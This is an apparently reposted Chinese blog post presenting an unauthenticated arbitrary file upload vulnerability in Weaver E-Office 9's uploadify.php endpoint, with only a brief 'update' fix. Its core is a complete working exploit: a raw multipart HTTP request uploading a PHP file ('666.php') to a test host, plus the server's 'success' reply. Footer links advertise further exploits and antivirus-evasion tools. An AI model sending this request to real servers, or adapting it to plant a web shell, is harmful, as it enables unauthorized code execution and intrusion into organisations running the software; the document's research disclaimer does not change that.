0x01 前言
Weaver E-Office9版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传。
0x02 影响平台
本地测试环境 v9.0
0x03 漏洞复现
还是辣个熟悉的页面~~
EXP:
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.232.137:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
这个酱紫说明文件上传成功
success
0x04 修复方案
该漏洞已向公众披露并可能被使用,建议及时更新至无漏洞版本。
▶【漏洞系列】叮~你有新的速递!某友-OA信息泄露登录后台(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2023-33246 RCE漏洞(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2023-22480漏洞(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2023-25135漏洞(附EXP)
▶【漏洞系列】叮~你有新的速递!CVE-2023-27524漏洞利用Tools
▶【漏洞系列】叮~你有新的速递!Citrix CVE-2023-3519 RCE漏洞(附PoC)
▶【免杀系列】New免杀工具NPS更新5.21(附下载)
▶【免杀系列】TQL!最新Bypass360核晶与Defender免杀(附下载)
▶【免杀系列】Bypass | mimikatz的N种利用Tools包含一些免杀方法(附下载)
▶【免杀系列】New一款红队免杀生成Tools(附下载)
▶【移动安全】踩坑 | Fiddler雷电模拟器4.0无法抓包(超详细)
▶【移动安全】牛掰!Xposed检测绕过总结
觉得内容不错,就点下“赞”和“在看”
如侵权请私聊公众号删文
原文始发于微信公众号(哪都通安全):叮~你有新的速递!某微OA漏洞(附EXP)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论